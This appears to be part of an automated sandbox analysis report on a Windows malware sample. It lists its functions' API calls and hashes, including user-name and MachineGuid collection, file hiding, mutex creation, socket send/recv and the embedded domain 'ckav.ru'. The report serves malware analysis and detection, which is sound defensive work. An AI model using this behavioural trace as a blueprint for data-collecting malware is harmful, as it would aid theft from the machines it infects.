Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser_wmemset
String ID: CA
API String ID: 2078537776-1052703068
Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

